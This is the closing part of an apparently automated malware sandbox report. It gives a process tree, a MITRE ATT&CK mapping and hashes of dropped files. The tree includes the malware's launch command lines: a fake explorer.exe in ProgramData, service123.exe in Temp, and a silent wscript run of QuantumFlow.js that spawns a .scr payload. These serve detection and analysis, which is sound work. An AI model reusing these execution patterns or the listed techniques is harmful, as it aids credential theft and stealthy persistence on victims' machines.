                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.0.987300993\1873821537" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 22101 -prefMapSize 234008 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ad28da9-0570-49bb-a45b-7ada1fc3fc2b} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 1292 13efa158 gpu
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:2956
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.1.2076739528\391573078" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 22182 -prefMapSize 234008 -appDir "C:\Program Files\Mozilla Firefox\browser" - {12291f03-a3e4-4d12-b1e6-10a2af4c8041} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 1484 f9d6558 socket
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:3280
                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.2.273172105\1660345635" -childID 1 -isForBrowser -prefsHandle 1940 -prefMapHandle 1756 -prefsLen 22285 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd71874e-bd41-4ecd-a5f4-2fe6c425ea70} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 1860 1a8d2e58 tab
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:3932
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.3.693703508\1620096757" -childID 2 -isForBrowser -prefsHandle 2708 -prefMapHandle 2704 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04bfc105-f7f5-4755-b1aa-2443f36f7db6} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 2720 1ce28558 tab
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:2892
                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.4.1657515215\1041493314" -childID 3 -isForBrowser -prefsHandle 3020 -prefMapHandle 3016 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fbc33b2-e993-4109-9f2e-05f72aed22c2} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 3032 d6cd58 tab
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1760
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.5.342362300\1167277239" -childID 4 -isForBrowser -prefsHandle 3368 -prefMapHandle 3344 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {16977cb5-f119-492f-9e99-5c18534d6942} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 3380 20349b58 tab
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2528
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.6.2143577442\556027938" -childID 5 -isForBrowser -prefsHandle 3956 -prefMapHandle 3880 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bbf594d7-d7da-480e-95d9-6fd80139dc89} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 3968 21494a58 tab
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3808
                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.7.2011446213\1882518998" -childID 6 -isForBrowser -prefsHandle 4100 -prefMapHandle 4104 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a371060b-fdf3-4599-9273-19e6b5359b1c} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 4084 21493558 tab
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.8.519245093\1077557635" -childID 7 -isForBrowser -prefsHandle 4268 -prefMapHandle 4272 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {343f6562-5dc6-493a-a8af-7f729d808775} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 4256 21493e58 tab
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3076
                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.9.765705657\604729182" -childID 8 -isForBrowser -prefsHandle 3088 -prefMapHandle 3068 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {35709b94-0f49-45cd-9ce5-625f9756802e} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 3136 d60458 tab
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2776
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.10.1408008722\1015434887" -childID 9 -isForBrowser -prefsHandle 3088 -prefMapHandle 3068 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e100952-b578-4ee3-b73b-89567db54898} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 3120 20962c58 tab
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1492
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3928.11.556184930\1149753082" -childID 10 -isForBrowser -prefsHandle 4564 -prefMapHandle 4580 -prefsLen 27322 -prefMapSize 234008 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a0be7df-1680-48f0-bc93-a8d8600d4afc} 3928 "\\.\pipe\gecko-crash-server-pipe.3928" 4664 224f0a58 tab
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:3248
                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                            PID:3896
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                            PID:3452
                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                            PID:3764
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                            PID:3128
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\wscript.EXE
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2660
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr" "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\W"
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                PID:2664
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4060
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4056
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-169957855120975955142091216803-1855769883-1402408429603002828-2081825474883947343"
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2180
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1115428295169828869954317962587300988819098328621428971983-1151794769-1473478444"
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3772
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "289709124-1677187931569409644-16888030452061998939-644169140-535903788-1857892457"
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2640
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "449260429-641792278-158450608110274461621068480981925518792-1150555852690218391"
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3996
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-952502721-20803871987492983531716440997-10035823171617063158182139658082973921"
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:2384
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "1941646177-1435115782-848066915947108132-68161432-565981928104780026-514829773"
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2680
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-8657930202124554771100446983445178976-1091188773-12420344181920445339-336700866"
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3948
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2316
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "10396557641542254355-647414730383004521-6415451021766212926-1290900956891911994"
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2340
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-711840800-1111803152623421468-393474346-18242614201464744386-1678105569-1669127450"
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3596
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:3828
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2128
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3132

                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                        Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                        Resource Development

                                                                                                                                                                                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                                                                                                                                                                                        JavaScript

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1059.007

                                                                                                                                                                                                                                                                                                                                                                                        PowerShell

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1059.001

                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1053.005

                                                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                        T1562

                                                                                                                                                                                                                                                                                                                                                                                        Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                        T1562.001

                                                                                                                                                                                                                                                                                                                                                                                        Indirect Command Execution

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1202

                                                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                                                                        Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1553

                                                                                                                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1553.004

                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                                                                        Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1555

                                                                                                                                                                                                                                                                                                                                                                                        Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1555.003

                                                                                                                                                                                                                                                                                                                                                                                        Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                        T1552

                                                                                                                                                                                                                                                                                                                                                                                        Credentials In Files

                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                        T1552.001

                                                                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                                                                        Process Discovery

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1057

                                                                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                                                                        8
                                                                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                                                                        System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1614

                                                                                                                                                                                                                                                                                                                                                                                        System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1614.001

                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                        Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                                                                        Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                          de140135fb9277d93ece18cdd3da177e

                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                          b5654c48b4137843739c1457f65b7c089e76e7d4

                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                          97ae6794d8f1c78ba25e2911983e0f29b9a753dbf78a653195989a7010851921

                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                          21aa92715be00085992012b6c5f2bf39c988160da05a3d3bf231264a8296f95e4445fbfa0d3137ba4b553bd8a3b95237cfdf65f9156c73ed83e166d1b3d8454d

                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\KFIIJJJD
                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                          92KB

                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                          102841a614a648b375e94e751611b38f

                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                          1368e0d6d73fa3cee946bdbf474f577afffe2a43

                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                          c82ee2a0dc2518cb1771e07ce4b91f5ef763dd3dd006819aece867e82a139264

                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                          ca18a888dca452c6b08ad9f14b4936eb9223346c45c96629c3ee4dd6742e947b6825662b42e793135e205af77ad35e6765ac6a2b42cefed94781b3463a811f0a

                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                          342B

                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                          c9d26af487ee9e9bb5095335fea876fb

                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                          706c89f3b655f9c34d18a308c2d26e96e05d60ce

                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                          09e0aa5477eb279919a0fccf3513cb48d02a30e5c44c1c2f1efa2db80342da25

                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                          9c347add963ba42d88b7d73d2c21201bb37937cd96de4cfa885d98493405d358fa5167e2b575d7837c39994611b2ee1354aaf3af4cce6481f46fc1bd03769bdd

                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                          187B

                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\es\messages.json
                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                          151B

                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                          bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                          9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                          b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                          3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                          136B

                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

